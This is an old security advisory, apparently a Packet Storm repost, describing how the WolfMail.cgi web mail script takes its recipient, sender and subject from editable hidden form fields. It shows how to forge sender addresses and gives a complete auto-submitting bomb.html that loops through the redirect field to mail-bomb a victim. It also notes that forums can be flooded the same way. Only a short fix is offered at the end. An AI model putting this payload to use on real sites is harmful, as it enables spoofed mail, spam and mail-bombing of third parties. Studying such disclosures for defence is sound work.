WolfMail.cgi, a script that works similarly to formmail.cgi, allows users to send mail via a web interface. The configuration for WolfMail.cgi is not internally hardcoded but is passed via parameters in html input statements allowing any user to send fake mail.
3778400e8f79eb597d173c53cc2b7232adf9d3124bea0458e83e4ede52030d94
*+-._\_.-+*
WolfMail.cgi
*+-._/_.-+*
by Dead Beat
The Advanced Knowledge Network
https://www.advknowledge.net
Mailirritation possibillity
(fake and highfire an account)
Wolfmail is a script similar to formmail.cgi which allows users to send mails
from the page without using their Mailclient. However I guess the developers didn't
want to make the script in the way that you configurate it in the actual script but
send all the variables to the script from the actuall execution file.
________
FAKING:
So as said most of the real configuration is done in the actual _.html file so for
example the <input type="hidden" name="recipient" value="user@host.com">
is specified in the _.html file of the composer. You can easily download the site and
change the code. If, for example you, want to fake a mail to: "fake@mailhost.com" you
just have to change the value field. Other things like subject and cc can be defined
(read the installation papers to learn more)
For Example:
<input type="hidden" name="recipient" value="email@example.com">
<input type="hidden" name="subject" value="From your site...">
could be changed to:
<input type="text" name="recipient" value="spam@mail.com">
<input type="text" name="subject" value="Hi you">
<input type="text" name="abemail" value="fake@mail.com" size="17" maxlength="140">
that would allow you to self define those two values and send the mail from fake@mail.com to spam@mail.com.
Just so that I don't get any mails of any users here that don't understand this:
When you download the html file to change all the stuff you have to set the path to where
formmail.php actually is so if you download it you will find a line like this:
<form action="scripts/formmail.php" method="POST" enctype="multipart/form-data">
If you downloaded from https://www.mailscriptuser.com/contact.html you have to change the upper line to:
<form action="https://www.mailscriptuser.com/scripts/formmail.php" method="POST" enctype="multipart/form-data">
Got that? Good next little security vuln. attackers could trip over is the kind of bombing an adress.
___________
HIGH FIRE
There is a variable called "redirect" this allows you to send the user to a site after the actual
mailing is done.(Something that tells you such as: "Thanks! Your mail was send" or whatever) this
option looks like this
<input TYPE="HIDDEN" name="redirect" value="https://www.domain.com/contact/mail/thanks.htm">
Since the script itself doesn't check(log) your IP an
attacker could download the html file, predefine all values(like message, subject, recipient,...) and then
set a java-script that reloads the site and set the redirect url to the html with the predefined values this
way a loop would run and send, send and send emails all over and over again.
EXAMPLE bomb.html:
<html>
<head>
<body onload="document.bomber.submit();">
<form name="bomber" method="POST" action="https://www.domain.com/contact/mail/wolfmail.cgi">
<input TYPE="text" name="required" value="adMail-Text|abemail">
<input TYPE="text" name="subject" value="Exploiting wolfmail.cgi">
<input TYPE="text" name="recipient" value="Victim@mail.com">
<input TYPE="text" name="redirect" value="C:\Exploit\bomb.html">
<input type="text" name="aaName" value="Wolfmail Exploiter" size="17" maxlength="140">
<input type="text" name="abemail" value="fake@mail.com" size="17" maxlength="140">
<textarea name="adMail-Text" rows="4" cols="13" wrap="virtual">Bombing text goes here</textarea>
<input type="submit" value="submit">
</body>
</head>
</html>
The upper script can of course be used on many forms, so other mailforms may be affected too.
It is also possible to flood forums with such script! I hope you will re-configure and check
out your forms and the actual scripts behind it for this vulnerabillity. If you have found
another script that this trick works with mail me I will include them here and you will get
a credit ofcourse!
SOLUTION
You should change the script or use another one so that the IP's you send from can only be used
ONCE and let the email be predefined in a file or in the actual script.
I am quite sure that these aren't all of the bugs but I didn't really go into the code. This is
just what I saw first. Thanks to b0iler and Ravish! Greetings out to StartX, Road^K|ll, Silver
and all of my friends I forgot!
Truthfully,
Dead Beat, strebergarten@hotmail.com
The Advanced Knowledge Network
https://www.advknowledge.net
Want more, new, better BUGS and other Informations? Then visit us!
--
Best regards,
Dead Beat
The Advanced Knowledge Network
https://www.advknowledge.net
mailto:Dead_Beat@gmx.de
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed